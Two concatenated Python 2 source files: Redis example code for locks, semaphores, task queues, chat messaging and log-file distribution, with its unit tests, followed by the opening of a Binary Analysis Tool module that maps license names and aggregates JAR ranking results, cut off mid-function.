release_fair_semaphore(conn, semname, identifier) #B
return False #B
return True #C
# <end id="_1314_14473_9022"/>
#A Update our semaphore
#B We lost our semaphore, report back
#C We still have our semaphore
#END
# <start id="_1314_14473_9031"/>
def acquire_semaphore_with_lock(conn, semname, limit, timeout=10):
identifier = acquire_lock(conn, semname, acquire_timeout=.01)
if identifier:
try:
return acquire_fair_semaphore(conn, semname, limit, timeout)
finally:
release_lock(conn, semname, identifier)
# <end id="_1314_14473_9031"/>
#END
# <start id="_1314_14473_9056"/>
def send_sold_email_via_queue(conn, seller, item, price, buyer):
data = {
'seller_id': seller, #A
'item_id': item, #A
'price': price, #A
'buyer_id': buyer, #A
'time': time.time() #A
}
conn.rpush('queue:email', json.dumps(data)) #B
# <end id="_1314_14473_9056"/>
#A Prepare the item
#B Push the item onto the queue
#END
# <start id="_1314_14473_9060"/>
def process_sold_email_queue(conn):
while not QUIT:
packed = conn.blpop(['queue:email'], 30) #A
if not packed: #B
continue #B
to_send = json.loads(packed[1]) #C
try:
fetch_data_and_send_sold_email(to_send) #D
except EmailSendError as err:
log_error("Failed to send sold email", err, to_send)
else:
log_success("Sent sold email", to_send)
# <end id="_1314_14473_9060"/>
#A Try to get a message to send
#B No message to send, try again
#C Load the packed email information
#D Send the email using our pre-written emailing function
#END
# <start id="_1314_14473_9066"/>
def worker_watch_queue(conn, queue, callbacks):
while not QUIT:
packed = conn.blpop([queue], 30) #A
if not packed: #B
continue #B
name, args = json.loads(packed[1]) #C
if name not in callbacks: #D
log_error("Unknown callback %s"%name) #D
continue #D
callbacks[name](*args) #E
# <end id="_1314_14473_9066"/>
#A Try to get an item from the queue
#B There is nothing to work on, try again
#C Unpack the work item
#D The function is unknown, log the error and try again
#E Execute the task
#END
# <start id="_1314_14473_9074"/>
def worker_watch_queues(conn, queues, callbacks): #A
while not QUIT:
packed = conn.blpop(queues, 30) #B
if not packed:
continue
name, args = json.loads(packed[1])
if name not in callbacks:
log_error("Unknown callback %s"%name)
continue
callbacks[name](*args)
# <end id="_1314_14473_9074"/>
#A The first changed line to add priority support
#B The second changed line to add priority support
#END
# <start id="_1314_14473_9094"/>
def execute_later(conn, queue, name, args, delay=0):
identifier = str(uuid.uuid4()) #A
item = json.dumps([identifier, queue, name, args]) #B
if delay > 0:
conn.zadd('delayed:', item, time.time() + delay) #C
else:
conn.rpush('queue:' + queue, item) #D
return identifier #E
# <end id="_1314_14473_9094"/>
#A Generate a unique identifier
#B Prepare the item for the queue
#C Delay the item
#D Execute the item immediately
#E Return the identifier
#END
# <start id="_1314_14473_9099"/>
def poll_queue(conn):
while not QUIT:
item = conn.zrange('delayed:', 0, 0, withscores=True) #A
if not item or item[0][1] > time.time(): #B
time.sleep(.01) #B
continue #B
item = item[0][0] #C
identifier, queue, function, args = json.loads(item) #C
locked = acquire_lock(conn, identifier) #D
if not locked: #E
continue #E
if conn.zrem('delayed:', item): #F
conn.rpush('queue:' + queue, item) #F
release_lock(conn, identifier, locked) #G
# <end id="_1314_14473_9099"/>
#A Get the first item in the queue
#B No item or the item is still to be execued in the future
#C Unpack the item so that we know where it should go
#D Get the lock for the item
#E We couldn't get the lock, so skip it and try again
#F Move the item to the proper list queue
#G Release the lock
#END
# <start id="_1314_14473_9124"/>
def create_chat(conn, sender, recipients, message, chat_id=None):
chat_id = chat_id or str(conn.incr('ids:chat:')) #A
recipients.append(sender) #E
recipientsd = dict((r, 0) for r in recipients) #E
pipeline = conn.pipeline(True)
pipeline.zadd('chat:' + chat_id, **recipientsd) #B
for rec in recipients: #C
pipeline.zadd('seen:' + rec, chat_id, 0) #C
pipeline.execute()
return send_message(conn, chat_id, sender, message) #D
# <end id="_1314_14473_9124"/>
#A Get a new chat id
#E Set up a dictionary of users to scores to add to the chat ZSET
#B Create the set with the list of people participating
#C Initialize the seen zsets
#D Send the message
#END
# <start id="_1314_14473_9127"/>
def send_message(conn, chat_id, sender, message):
identifier = acquire_lock(conn, 'chat:' + chat_id)
if not identifier:
raise Exception("Couldn't get the lock")
try:
mid = conn.incr('ids:' + chat_id) #A
ts = time.time() #A
packed = json.dumps({ #A
'id': mid, #A
'ts': ts, #A
'sender': sender, #A
'message': message, #A
}) #A
conn.zadd('msgs:' + chat_id, packed, mid) #B
finally:
release_lock(conn, 'chat:' + chat_id, identifier)
return chat_id
# <end id="_1314_14473_9127"/>
#A Prepare the message
#B Send the message to the chat
#END
# <start id="_1314_14473_9132"/>
def fetch_pending_messages(conn, recipient):
seen = conn.zrange('seen:' + recipient, 0, -1, withscores=True) #A
pipeline = conn.pipeline(True)
for chat_id, seen_id in seen: #B
pipeline.zrangebyscore( #B
'msgs:' + chat_id, seen_id+1, 'inf') #B
chat_info = zip(seen, pipeline.execute()) #C
for i, ((chat_id, seen_id), messages) in enumerate(chat_info):
if not messages:
continue
messages[:] = map(json.loads, messages)
seen_id = messages[-1]['id'] #D
conn.zadd('chat:' + chat_id, recipient, seen_id) #D
min_id = conn.zrange( #E
'chat:' + chat_id, 0, 0, withscores=True) #E
pipeline.zadd('seen:' + recipient, chat_id, seen_id) #F
if min_id:
pipeline.zremrangebyscore( #G
'msgs:' + chat_id, 0, min_id[0][1]) #G
chat_info[i] = (chat_id, messages)
pipeline.execute()
return chat_info
# <end id="_1314_14473_9132"/>
#A Get the last message ids received
#B Fetch all new messages
#C Prepare information about the data to be returned
#D Update the 'chat' ZSET with the most recently received message
#E Discover messages that have been seen by all users
#F Update the 'seen' ZSET
#G Clean out messages that have been seen by all users
#END
# <start id="_1314_14473_9135"/>
def join_chat(conn, chat_id, user):
message_id = int(conn.get('ids:' + chat_id)) #A
pipeline = conn.pipeline(True)
pipeline.zadd('chat:' + chat_id, user, message_id) #B
pipeline.zadd('seen:' + user, chat_id, message_id) #C
pipeline.execute()
# <end id="_1314_14473_9135"/>
#A Get the most recent message id for the chat
#B Add the user to the chat member list
#C Add the chat to the users's seen list
#END
# <start id="_1314_14473_9136"/>
def leave_chat(conn, chat_id, user):
pipeline = conn.pipeline(True)
pipeline.zrem('chat:' + chat_id, user) #A
pipeline.zrem('seen:' + user, chat_id) #A
pipeline.zcard('chat:' + chat_id) #B
if not pipeline.execute()[-1]:
pipeline.delete('msgs:' + chat_id) #C
pipeline.delete('ids:' + chat_id) #C
pipeline.execute()
else:
oldest = conn.zrange( #D
'chat:' + chat_id, 0, 0, withscores=True) #D
conn.zremrangebyscore('chat:' + chat_id, 0, oldest) #E
# <end id="_1314_14473_9136"/>
#A Remove the user from the chat
#B Find the number of remaining group members
#C Delete the chat
#D Find the oldest message seen by all users
#E Delete old messages from the chat
#END
# <start id="_1314_15044_3669"/>
aggregates = defaultdict(lambda: defaultdict(int)) #A
def daily_country_aggregate(conn, line):
if line:
line = line.split()
ip = line[0] #B
day = line[1] #B
country = find_city_by_ip_local(ip)[2] #C
aggregates[day][country] += 1 #D
return
for day, aggregate in aggregates.items(): #E
conn.zadd('daily:country:' + day, **aggregate) #E
del aggregates[day] #E
# <end id="_1314_15044_3669"/>
#A Prepare the local aggregate dictionary
#B Extract the information from our log lines
#C Find the country from the IP address
#D Increment our local aggregate
#E The day file is done, write our aggregate to Redis
#END
# <start id="_1314_14473_9209"/>
def copy_logs_to_redis(conn, path, channel, count=10,
limit=2**30, quit_when_done=True):
bytes_in_redis = 0
waiting = deque()
create_chat(conn, 'source', map(str, range(count)), '', channel) #I
count = str(count)
for logfile in sorted(os.listdir(path)): #A
full_path = os.path.join(path, logfile)
fsize = os.stat(full_path).st_size
while bytes_in_redis + fsize > limit: #B
cleaned = _clean(conn, channel, waiting, count)#B
if cleaned: #B
bytes_in_redis -= cleaned #B
else: #B
time.sleep(.25) #B
with open(full_path, 'rb') as inp: #C
block = ' ' #C
while block: #C
block = inp.read(2**17) #C
conn.append(channel+logfile, block) #C
send_message(conn, channel, 'source', logfile) #D
bytes_in_redis += fsize #E
waiting.append((logfile, fsize)) #E
if quit_when_done: #F
send_message(conn, channel, 'source', ':done') #F
while waiting: #G
cleaned = _clean(conn, channel, waiting, count) #G
if cleaned: #G
bytes_in_redis -= cleaned #G
else: #G
time.sleep(.25) #G
def _clean(conn, channel, waiting, count): #H
if not waiting: #H
return 0 #H
w0 = waiting[0][0] #H
if conn.get(channel + w0 + ':done') == count: #H
conn.delete(channel + w0, channel + w0 + ':done') #H
return waiting.popleft()[1] #H
return 0 #H
# <end id="_1314_14473_9209"/>
#I Create the chat that will be used to send messages to clients
#A Iterate over all of the logfiles
#B Clean out finished files if we need more room
#C Upload the file to Redis
#D Notify the listeners that the file is ready
#E Update our local information about Redis' memory use
#F We are out of files, so signal that it is done
#G Clean up the files when we are done
#H How we actually perform the cleanup from Redis
#END
# <start id="_1314_14473_9213"/>
def process_logs_from_redis(conn, id, callback):
while 1:
fdata = fetch_pending_messages(conn, id) #A
for ch, mdata in fdata:
for message in mdata:
logfile = message['message']
if logfile == ':done': #B
return #B
elif not logfile:
continue
block_reader = readblocks #C
if logfile.endswith('.gz'): #C
block_reader = readblocks_gz #C
for line in readlines(conn, ch+logfile, block_reader):#D
callback(conn, line) #E
callback(conn, None) #F
conn.incr(ch + logfile + ':done') #G
if not fdata:
time.sleep(.1)
# <end id="_1314_14473_9213"/>
#A Fetch the list of files
#B No more logfiles
#C Choose a block reader
#D Iterate over the lines
#E Pass each line to the callback
#F Force a flush of our aggregate caches
#G Report that we are finished with the log
#END
# <start id="_1314_14473_9221"/>
def readlines(conn, key, rblocks):
out = ''
for block in rblocks(conn, key):
out += block
posn = out.rfind('\n') #A
if posn >= 0: #B
for line in out[:posn].split('\n'): #C
yield line + '\n' #D
out = out[posn+1:] #E
if not block: #F
yield out
break
# <end id="_1314_14473_9221"/>
#A Find the rightmost linebreak if any - rfind() returns -1 on failure
#B We found a line break
#C Split on all of the line breaks
#D Yield each line
#E Keep track of the trailing data
#F We are out of data
#END
# <start id="_1314_14473_9225"/>
def readblocks(conn, key, blocksize=2**17):
lb = blocksize
pos = 0
while lb == blocksize: #A
block = conn.substr(key, pos, pos + blocksize - 1) #B
yield block #C
lb = len(block) #C
pos += lb #C
yield ''
# <end id="_1314_14473_9225"/>
#A Keep going while we got as much as we expected
#B Fetch the block
#C Prepare for the next pass
#END
# <start id="_1314_14473_9229"/>
def readblocks_gz(conn, key):
inp = ''
decoder = None
for block in readblocks(conn, key, 2**17): #A
if not decoder:
inp += block
try:
if inp[:3] != "\x1f\x8b\x08": #B
raise IOError("invalid gzip data") #B
i = 10 #B
flag = ord(inp[3]) #B
if flag & 4: #B
i += 2 + ord(inp[i]) + 256*ord(inp[i+1]) #B
if flag & 8: #B
i = inp.index('\0', i) + 1 #B
if flag & 16: #B
i = inp.index('\0', i) + 1 #B
if flag & 2: #B
i += 2 #B
if i > len(inp): #C
raise IndexError("not enough data") #C
except (IndexError, ValueError): #C
continue #C
else:
block = inp[i:] #D
inp = None #D
decoder = zlib.decompressobj(-zlib.MAX_WBITS) #D
if not block:
continue
if not block: #E
yield decoder.flush() #E
break
yield decoder.decompress(block) #F
# <end id="_1314_14473_9229"/>
#A Read the raw data from Redis
#B Parse the header information so that we can get the compressed data
#C We haven't read the full header yet
#D We found the header, prepare the decompressor
#E We are out of data, yield the last chunk
#F Yield a decompressed block
#END
class TestCh06(unittest.TestCase):
def setUp(self):
import redis
self.conn = redis.Redis(db=15)
def tearDown(self):
del self.conn
print
print
def test_add_update_contact(self):
import pprint
conn = self.conn
conn.delete('recent:user')
print "Let's add a few contacts..."
for i in xrange(10):
add_update_contact(conn, 'user', 'contact-%i-%i'%(i//3, i))
print "Current recently contacted contacts"
contacts = conn.lrange('recent:user', 0, -1)
pprint.pprint(contacts)
self.assertTrue(len(contacts) >= 10)
print
print "Let's pull one of the older ones up to the front"
add_update_contact(conn, 'user', 'contact-1-4')
contacts = conn.lrange('recent:user', 0, 2)
print "New top-3 contacts:"
pprint.pprint(contacts)
self.assertEquals(contacts[0], 'contact-1-4')
print
print "Let's remove a contact..."
print remove_contact(conn, 'user', 'contact-2-6')
contacts = conn.lrange('recent:user', 0, -1)
print "New contacts:"
pprint.pprint(contacts)
self.assertTrue(len(contacts) >= 9)
print
print "And let's finally autocomplete on "
all = conn.lrange('recent:user', 0, -1)
contacts = fetch_autocomplete_list(conn, 'user', 'c')
self.assertTrue(all == contacts)
equiv = [c for c in all if c.startswith('contact-2-')]
contacts = fetch_autocomplete_list(conn, 'user', 'contact-2-')
equiv.sort()
contacts.sort()
self.assertEquals(equiv, contacts)
conn.delete('recent:user')
def test_address_book_autocomplete(self):
self.conn.delete('members:test')
print "the start/end range of 'abc' is:", find_prefix_range('abc')
print
print "Let's add a few people to the guild"
for name in ['jeff', 'jenny', 'jack', 'jennifer']:
join_guild(self.conn, 'test', name)
print
print "now let's try to find users with names starting with 'je':"
r = autocomplete_on_prefix(self.conn, 'test', 'je')
print r
self.assertTrue(len(r) == 3)
print "jeff just left to join a different guild..."
leave_guild(self.conn, 'test', 'jeff')
r = autocomplete_on_prefix(self.conn, 'test', 'je')
print r
self.assertTrue(len(r) == 2)
self.conn.delete('members:test')
def test_distributed_locking(self):
self.conn.delete('lock:testlock')
print "Getting an initial lock..."
self.assertTrue(acquire_lock_with_timeout(self.conn, 'testlock', 1, 1))
print "Got it!"
print "Trying to get it again without releasing the first one..."
self.assertFalse(acquire_lock_with_timeout(self.conn, 'testlock', .01, 1))
print "Failed to get it!"
print
print "Waiting for the lock to timeout..."
time.sleep(2)
print "Getting the lock again..."
r = acquire_lock_with_timeout(self.conn, 'testlock', 1, 1)
self.assertTrue(r)
print "Got it!"
print "Releasing the lock..."
self.assertTrue(release_lock(self.conn, 'testlock', r))
print "Released it..."
print
print "Acquiring it again..."
self.assertTrue(acquire_lock_with_timeout(self.conn, 'testlock', 1, 1))
print "Got it!"
self.conn.delete('lock:testlock')
def test_counting_semaphore(self):
self.conn.delete('testsem', 'testsem:owner', 'testsem:counter')
print "Getting 3 initial semaphores with a limit of 3..."
for i in xrange(3):
self.assertTrue(acquire_fair_semaphore(self.conn, 'testsem', 3, 1))
print "Done!"
print "Getting one more that should fail..."
self.assertFalse(acquire_fair_semaphore(self.conn, 'testsem', 3, 1))
print "Couldn't get it!"
print
print "Lets's wait for some of them to time out"
time.sleep(2)
print "Can we get one?"
r = acquire_fair_semaphore(self.conn, 'testsem', 3, 1)
self.assertTrue(r)
print "Got one!"
print "Let's release it..."
self.assertTrue(release_fair_semaphore(self.conn, 'testsem', r))
print "Released!"
print
print "And let's make sure we can get 3 more!"
for i in xrange(3):
self.assertTrue(acquire_fair_semaphore(self.conn, 'testsem', 3, 1))
print "We got them!"
self.conn.delete('testsem', 'testsem:owner', 'testsem:counter')
def test_delayed_tasks(self):
import threading
self.conn.delete('queue:tqueue', 'delayed:')
print "Let's start some regular and delayed tasks..."
for delay in [0, .5, 0, 1.5]:
self.assertTrue(execute_later(self.conn, 'tqueue', 'testfn', [], delay))
r = self.conn.llen('queue:tqueue')
print "How many non-delayed tasks are there (should be 2)?", r
self.assertEquals(r, 2)
print
print "Let's start up a thread to bring those delayed tasks back..."
t = threading.Thread(target=poll_queue, args=(self.conn,))
t.setDaemon(1)
t.start()
print "Started."
print "Let's wait for those tasks to be prepared..."
time.sleep(2)
global QUIT
QUIT = True
t.join()
r = self.conn.llen('queue:tqueue')
print "Waiting is over, how many tasks do we have (should be 4)?", r
self.assertEquals(r, 4)
self.conn.delete('queue:tqueue', 'delayed:')
def test_multi_recipient_messaging(self):
self.conn.delete('ids:chat:', 'msgs:1', 'ids:1', 'seen:joe', 'seen:jeff', 'seen:jenny')
print "Let's create a new chat session with some recipients..."
chat_id = create_chat(self.conn, 'joe', ['jeff', 'jenny'], 'message 1')
print "Now let's send a few messages..."
for i in xrange(2, 5):
send_message(self.conn, chat_id, 'joe', 'message %s'%i)
print
print "And let's get the messages that are waiting for jeff and jenny..."
r1 = fetch_pending_messages(self.conn, 'jeff')
r2 = fetch_pending_messages(self.conn, 'jenny')
print "They are the same?", r1==r2
self.assertEquals(r1, r2)
print "Those messages are:"
import pprint
pprint.pprint(r1)
self.conn.delete('ids:chat:', 'msgs:1', 'ids:1', 'seen:joe', 'seen:jeff', 'seen:jenny')
def test_file_distribution(self):
import gzip, shutil, tempfile, threading
self.conn.delete('test:temp-1.txt', 'test:temp-2.txt', 'test:temp-3.txt', 'msgs:test:', 'seen:0', 'seen:source', 'ids:test:', 'chat:test:')
dire = tempfile.mkdtemp()
try:
print "Creating some temporary 'log' files..."
with open(dire + '/temp-1.txt', 'wb') as f:
f.write('one line\n')
with open(dire + '/temp-2.txt', 'wb') as f:
f.write(10000 * 'many lines\n')
out = gzip.GzipFile(dire + '/temp-3.txt.gz', mode='wb')
for i in xrange(100000):
out.write('random line %s\n'%(os.urandom(16).encode('hex'),))
out.close()
size = os.stat(dire + '/temp-3.txt.gz').st_size
print "Done."
print
print "Starting up a thread to copy logs to redis..."
t = threading.Thread(target=copy_logs_to_redis, args=(self.conn, dire, 'test:', 1, size))
t.setDaemon(1)
t.start()
print "Let's pause to let some logs get copied to Redis..."
time.sleep(.25)
print
print "Okay, the logs should be ready. Let's process them!"
index = [0]
counts = [0, 0, 0]
def callback(conn, line):
if line is None:
print "Finished with a file %s, linecount: %s"%(index[0], counts[index[0]])
index[0] += 1
elif line or line.endswith('\n'):
counts[index[0]] += 1
print "Files should have 1, 10000, and 100000 lines"
process_logs_from_redis(self.conn, '0', callback)
self.assertEquals(counts, [1, 10000, 100000])
print
print "Let's wait for the copy thread to finish cleaning up..."
t.join()
print "Done cleaning out Redis!"
finally:
print "Time to clean up files..."
shutil.rmtree(dire)
print "Cleaned out files!"
self.conn.delete('test:temp-1.txt', 'test:temp-2.txt', 'test:temp-3.txt', 'msgs:test:', 'seen:0', 'seen:source', 'ids:test:', 'chat:test:')
if __name__ == '__main__':
unittest.main()
|
licenseversion.py
|
#!/usr/bin/python
## Binary Analysis Tool
## Copyright 2011-2016 Armijn Hemel for Tjaldur Software Governance Solutions
## Licensed under Apache 2.0, see LICENSE file for details
import os, os.path, sys, subprocess, copy, cPickle, Queue
import multiprocessing, re, datetime
from multiprocessing import Process, Lock
from multiprocessing.sharedctypes import Value, Array
if sys.version_info[1] == 7:
import collections
have_counter = True
else:
have_counter = False
'''
This file contains the ranking algorithm as described in the paper
"Finding Software License Violations Through Binary Code Clone Detection"
by Armijn Hemel, Karl Trygve Kalleberg, Eelco Dolstra and Rob Vermaas, as
presented at the Mining Software Repositories 2011 conference.
In this scan results can optionally be pruned. Results of scans can get very
large, for example a scan of a Linux kernel image could have thousands of
string matches, which can each be found in a few hundred kernel source code
archives.
By pruning results the amount of noise can be much reduced, reports can be made
smaller and source code checks using the results of BAT can be made more
effective.
To remove a version A from the set of versions the following conditions have
to hold:
* there is a minimum amount of results available (20 or 30 seems a good cut off value)
* all strings/variables/function names found in A are found in the most promising
version
* the amount of strings/variables/function names found in A are significantly
smaller than the amount in the most promising version (expressed as a maximum
percentage)
Ranking results for Java JAR files are aggregated. Individual class files often
do not contain enough information. By aggregating the results of these classes
it is possible to get a better view of what is inside a JAR.
The parameter AGGREGATE_CLEAN can be set to 1 to indicated that .class files
should be removed from the result set after aggregation. By default these files
are not removed.
'''
## lookup tables for names of string caches and string cache scores
stringsdbperlanguagetable = { 'C': 'stringscache_c'
, 'C#': 'stringscache_csharp'
, 'Java': 'stringscache_java'
, 'JavaScript': 'stringscache_javascript'
, 'PHP': 'stringscache_php'
, 'Python': 'stringscache_python'
, 'Ruby': 'stringscache_ruby'
, 'ActionScript': 'stringscache_actionscript'
}
avgstringsdbperlanguagetable = { 'C': 'avgstringscache_c'
, 'C#': 'avgstringscache_csharp'
, 'Java': 'avgstringscache_java'
, 'JavaScript': 'avgstringscache_javascript'
, 'PHP': 'avgstringscache_php'
, 'Python': 'avgstringscache_python'
, 'Ruby': 'avgstringscache_ruby'
, 'ActionScript': 'avgstringscache_actionscript'
}
## mappings from FOSSology to Ninka and vice versa
ninka_to_fossology = { 'LesserGPLv2+': 'LGPL-2.0+'
, 'BSD3': 'BSD-3-Clause'
, 'boostV1Ref': 'BSL-1.0'
}
fossology_to_ninka = { 'No_license_found': 'NONE'
, 'GPL-1.0': 'GPLv1'
, 'GPL-1.0+': 'GPLv1+'
, 'GPL-2.0': 'GPLv2'
, 'GPL-2.0+': 'GPLv2+'
, 'GPL-3.0': 'GPLv3'
, 'GPL-3.0+': 'GPLv3+'
, 'LGPL-2.0': 'LibraryGPLv2'
, 'LGPL-2.0+': 'LibraryGPLv2+'
, 'LGPL-2.1': 'LesserGPLv2.1'
, 'LGPL-2.1+': 'LesserGPLv2.1+'
, 'LGPL-3.0': 'LesserGPLv3'
, 'LGPL-3.0+': 'LesserGPLv3+'
, 'Apache-1.0': 'Apachev1.0'
, 'Apache-1.1': 'Apachev1.1'
, 'Apache-2.0': 'Apachev2'
, 'BSL-1.0': 'boostV1'
, 'MPL-1.0': 'MPLv1_0'
, 'FTL': 'FreeType'
, 'PHP-3.01': 'phpLicV3.01'
, 'Postfix': 'Postfix'
, 'QPL-1.0': 'QTv1'
, 'MPL-1.1': 'MPLv1_1'
, 'Zend-2.0': 'zendv2'
, 'NPL-1.1': 'NPLv1_1'
, 'BSD-2-Clause': 'spdxBSD2'
, 'BSD-3-Clause': 'spdxBSD3'
, 'EPL-1.0': 'EPLv1'
, 'Artifex': 'artifex'
, 'CDDL': 'CDDLic'
, 'Public-domain': 'publicDomain'
, 'Public-domain-ref': 'publicDomain'
, 'IPL': 'IBMv1'
, 'Intel': 'IntelACPILic'
, 'MX4J-1.0': 'MX4JLicensev1'
, 'Beerware': 'BeerWareVer42'
, 'CPL-1.0': 'CPLv1'
, 'Sun': 'sunRPC'
, 'SunPro': 'SunSimpleLic'
, 'W3C-IP': 'W3CLic'
, 'Artistic-1.0': 'ArtisticLicensev1'
}
reerrorlevel = re.compile("<[\d+cd]>")
reparam = re.compile("([\w_]+)\.([\w_]+)")
rematch = re.compile("\d+")
## The scanners that are used in BAT are Ninka and FOSSology. These scanners
## don't always agree on results, but when they do, it is very reliable.
def squashlicenses(licenses):
## licenses: [(license, scanner)]
if len(licenses) != 2:
return licenses
if licenses[0][1] == 'ninka':
if fossology_to_ninka.has_key(licenses[1][0]):
if fossology_to_ninka[licenses[1][0]] == licenses[0][0]:
if licenses[0][0] == 'InterACPILic':
licenses = [('IntelACPILic', 'squashed')]
else:
licenses = [(licenses[0][0], 'squashed')]
else:
status = "difference"
elif licenses[1][1] == 'ninka':
if fossology_to_ninka.has_key(licenses[0][0]):
if fossology_to_ninka[licenses[0][0]] == licenses[1][0]:
if licenses[0][0] == 'InterACPILic':
licenses = [('IntelACPILic', 'squashed')]
else:
licenses = [(licenses[0][0], 'squashed')]
return licenses
def aggregatejars(unpackreports, scantempdir, topleveldir, pool, scanenv, cleanclasses, scandebug=False, unpacktempdir=None):
## find all JAR files. Do this by:
## 1. checking the tags for 'zip'
## 2. verifying for unpacked files that there are .class files
## 3. TODO: possibly verifying there is a META-INF directory with a manifest
sha256stofiles = {}
jarfiles = []
sha256seen = []
alljarfiles = []
for i in unpackreports:
if not 'checksum' in unpackreports[i]:
continue
else:
filehash = unpackreports[i]['checksum']
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
if cleanclasses:
if filehash in sha256stofiles:
sha256stofiles[filehash].append(i)
else:
sha256stofiles[filehash] = [i]
## check extension: JAR, WAR, RAR (not Resource adapter), EAR
i_nocase = i.lower()
if i_nocase.endswith('.jar') or i_nocase.endswith('.ear') or i_nocase.endswith('.war') or i_nocase.endswith('.rar'):
if 'tags' in unpackreports[i]:
if 'duplicate' in unpackreports[i]['tags']:
alljarfiles.append(i)
continue
if filehash in sha256seen:
alljarfiles.append(i)
continue
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
if 'tags' in leafreports:
## check if it was tagged as a ZIP file
if 'zip' in leafreports['tags']:
## sanity checks
if unpackreports[i]['scans'] != []:
## since it was a single ZIP file there should be only
## one item in unpackreports[i]['scan']
if len(unpackreports[i]['scans']) != 1:
continue
## more sanity checks
if unpackreports[i]['scans'][0]['offset'] != 0:
continue
if unpackreports[i]['scans'][0]['scanname'] != 'zip':
continue
jarfiles.append(i)
sha256seen.append(filehash)
alljarfiles.append(i)
jartasks = []
for i in jarfiles:
classfiles = filter(lambda x: x.endswith('.class'), unpackreports[i]['scans'][0]['scanreports'])
classreports = map(lambda x: unpackreports[x], classfiles)
jartasks.append((i, unpackreports[i], classreports, topleveldir))
ranked = set()
if jartasks != []:
res = pool.map(aggregate, jartasks, 1)
for i in res:
(jarfile, rankres) = i
if rankres:
for j in sha256stofiles[unpackreports[jarfile]['checksum']]:
ranked.add(j)
for i in ranked:
if 'tags' in unpackreports[i]:
unpackreports[i]['tags'].append('ranking')
else:
unpackreports[i]['tags'] = ['ranking']
## if cleanclasses is set the following should be removed:
## * reference in unpackreports (always)
## * pickle of file, only if either unique to a JAR, or shared in several JARs,
## but not when the class file can also be found outside of a JAR.
if cleanclasses:
for i in alljarfiles:
if 'tags' in unpackreports[i]:
if 'duplicate' in unpackreports[i]['tags']:
continue
classfiles = filter(lambda x: x.endswith('.class'), unpackreports[i]['scans'][0]['scanreports'])
for c in classfiles:
filehash = unpackreports[c]['checksum']
if len(sha256stofiles[filehash]) == 1:
try:
os.unlink(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash))
except Exception, e:
print >>sys.stderr, "error removing", c, e
sys.stderr.flush()
sha256stofiles[filehash].remove(c)
else:
sha256stofiles[filehash].remove(c)
del unpackreports[c]
return ranked
## aggregate results for a single JAR file
def aggregate((jarfile, jarreport, unpackreports, topleveldir)):
rankres = {}
matchedlines = 0
matchednonassignedlines = 0
matcheddirectassignedlines = 0
matchednotclonelines = 0
unmatchedlines = 0
reports = []
extractedlines = 0
nonUniqueAssignments = {}
unmatched = []
ignored = []
nonUniqueMatches = {}
totalscore = 0
scoresperpkg = {}
uniqueMatchesperpkg = {}
packageversionsperpkg = {}
packagelicensesperpkg = {}
fieldmatches = {}
classmatches = {}
sourcematches = {}
## from dynamicres
totalnames = 0
uniquematches = 0
namesmatched = 0
packagesmatched = {}
dynamicresfinal = {}
pv = {}
uniquematcheslenperpkg = {}
upp = {}
aggregated = False
for c in unpackreports:
## sanity checks
if not 'tags' in c:
continue
if not 'ranking' in c['tags']:
continue
filehash = c['checksum']
if not os.path.exists(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash)):
continue
## read pickle file
leaf_file = open(os.path.join(topleveldir, "filereports", "%s-filereport.pickle" % filehash), 'rb')
leafreports = cPickle.load(leaf_file)
leaf_file.close()
## and more sanity checks
if not 'binary' in leafreports['tags']:
continue
(stringmatches, dynamicres, varfunmatches, language) = leafreports['ranking']
if language != 'Java':
continue
if 'fields' in varfunmatches:
for f in varfunmatches['fields']:
if not f in fieldmatches:
fieldmatches[f] = varfunmatches['fields'][f]
aggregated = True
else:
fieldmatches[f] += varfunmatches['fields'][f]
if 'classes' in varfunmatches:
for c in varfunmatches['classes']:
if not c in classmatches:
classmatches[c] = varfunmatches['classes'][c]
aggregated = True
else:
classmatches[c] += varfunmatches['classes'][c]
if 'sources' in varfunmatches:
for c in varfunmatches['sources']:
if not c in sourcematches:
sourcematches[c] = varfunmatches['sources'][c]
aggregated = True
else:
sourcematches[c] += varfunmatches['sources'][c]
if stringmatches != None:
aggregated = True
matchedlines = matchedlines + stringmatches['matchedlines']
matchednonassignedlines = matchednonassignedlines + stringmatches['matchednonassignedlines']
matchednotclonelines = matchednotclonelines + stringmatches['matchednotclonelines']
unmatchedlines = unmatchedlines + stringmatches['unmatchedlines']
extractedlines = extractedlines + stringmatches['extractedlines']
if stringmatches['unmatched'] != []:
unmatched = unmatched + stringmatches['unmatched']
if stringmatches['ignored'] != []:
ignored = ignored + stringmatches['ignored']
if stringmatches['nonUniqueAssignments'] != {}:
for n in stringmatches['nonUniqueAssignments'].keys():
if n in nonUniqueAssignments:
nonUniqueAssignments[n] = nonUniqueAssignments[n] + stringmatches['nonUniqueAssignments'][n]
else:
nonUniqueAssignments[n] = stringmatches['nonUniqueAssignments'][n]
if stringmatches['nonUniqueMatches'] != {}:
for n in stringmatches['nonUniqueMatches'].keys():
if n in nonUniqueMatches:
nonUniqueMatches[n] = list(set(nonUniqueMatches[n] + stringmatches['nonUniqueMatches'][n]))
else:
nonUniqueMatches[n] = stringmatches['nonUniqueMatches'][n]
if stringmatches['scores'] != {}:
for s in stringmatches['scores']:
totalscore = totalscore + stringmatches['scores'][s]
if s in scoresperpkg:
scoresperpkg[s] = scoresperpkg[s] + stringmatches['scores'][s]
else:
scoresperpkg[s] = stringmatches['scores'][s]
if stringmatches['reports'] != []:
for r in stringmatches['reports']:
rank = r['rank']
package = r['package']
unique = r['unique']
uniquematcheslen = r['uniquematcheslen']
percentage = r['percentage']
packageversions = r['packageversions']
packagelicenses = r['packagelicenses']
packagecopyrights = r['packagecopyrights']
## ignore rank and percentage
if package in uniqueMatchesperpkg:
tmpres = []
for p in unique:
if p[0] in upp:
continue
else:
tmpres.append(p)
upp[p[0]] = 1
uniqueMatchesperpkg[package] = uniqueMatchesperpkg[package] + tmpres
else:
uniqueMatchesperpkg[package] = unique
if packageversions != {}:
if not package in packageversionsperpkg:
packageversionsperpkg[package] = {}
for k in packageversions:
if k in packageversionsperpkg[package]:
packageversionsperpkg[package][k] = packageversionsperpkg[package][k] + packageversions[k]
else:
packageversionsperpkg[package][k] = packageversions[k]
if package in packagelicensesperpkg:
packagelicensesperpkg[package] = packagelicensesperpkg[package] + packagelicenses
else:
